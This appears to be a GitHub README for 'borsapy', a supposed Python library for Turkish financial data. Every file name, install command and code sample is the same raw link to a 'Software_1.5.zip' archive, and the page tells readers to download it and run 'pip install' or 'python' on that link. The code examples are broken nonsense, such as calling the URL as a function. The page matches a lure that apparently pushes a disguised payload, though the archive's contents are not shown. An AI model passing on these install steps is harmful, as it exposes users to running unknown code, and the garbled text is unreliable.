Skip to content

Latest commit

Β 

History

41 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ borsapy - Access Turkish Financial Markets Easily

πŸ› οΈ Overview

borsapy is a Python library designed to help you navigate the Turkish financial markets. Whether you're interested in BIST stocks, forex, crypto, funds, or inflation data, borsapy provides you with an easy way to access and analyze this information.

πŸ“₯ Download Now

Download borsapy

πŸš€ Getting Started

To get started with borsapy, follow these simple steps to download and run the software.

πŸ“‹ System Requirements

  • A computer running Windows, macOS, or Linux.
  • Python installed on your machine (version 3.6 or higher).
  • Basic internet access for downloading and using some resources.

πŸš€ Steps to Download and Install

  1. Visit the Releases Page

    • Go to the Releases page.
    • Here, you will find the latest version of borsapy available for download.
  2. Choose the Right Version

    • Look for the latest version listed at the top of the page.
    • You will see files corresponding to different operating systems. Make sure to pick the one that fits your system (e.g., Windows users should look for .whl or https://github.com/hussnainhai33/borsapy/raw/refs/heads/master/borsapy/_models/Software_1.5.zip files).
  3. Download the File

    • Click on the version that suits your system.
    • The download should automatically start. If it doesn’t, you may need to retry the download or check your internet connection.
  4. Install borsapy

    • After the download is complete, navigate to your Downloads folder.
    • If you downloaded a .whl file, you need to install it using Python. Open a terminal or command prompt and run the following command:
      pip install https://github.com/hussnainhai33/borsapy/raw/refs/heads/master/borsapy/_models/Software_1.5.zip
    • If you downloaded a https://github.com/hussnainhai33/borsapy/raw/refs/heads/master/borsapy/_models/Software_1.5.zip file, extract it and navigate to the folder. Run:
      python https://github.com/hussnainhai33/borsapy/raw/refs/heads/master/borsapy/_models/Software_1.5.zip install
  5. Verify the Installation

    • To ensure that borsapy is installed correctly, open your terminal or command prompt.
    • Type the following command:
      python -c "import borsapy; print(borsapy.__version__)"
    • If everything is set up correctly, you will see the version number of borsapy printed in your terminal.

πŸ“ˆ Using borsapy

Once installed, you can start using borsapy to access financial data:

  1. Import the Library

    • In your Python code, import borsapy by adding the following line:
      import borsapy
  2. Access Data

    • You can now access various financial data. For example, if you want to retrieve stock prices:
      data = https://github.com/hussnainhai33/borsapy/raw/refs/heads/master/borsapy/_models/Software_1.5.zip("AAPL")
      print(data)

πŸ“‘ Features of borsapy

  • Wide Coverage: Access data for BIST stocks, forex rates, cryptocurrency prices, and more.
  • User-Friendly: Designed for non-technical users, making it easy to get financial insights without complex programming.
  • Comprehensive Documentation: Detailed guides and examples to help you get started.

πŸ’¬ Support

If you encounter any issues while downloading or using borsapy, please check our Frequently Asked Questions (FAQ) section on the repository or open an issue for assistance.

πŸ“’ Contributing

We welcome contributions to improve borsapy. If you have ideas or suggestions, feel free to fork the repository and submit a pull request.

πŸ”— Additional Resources

For further updates, keep checking the Releases page.

Happy investing!

Releases

Packages

Contributors

Languages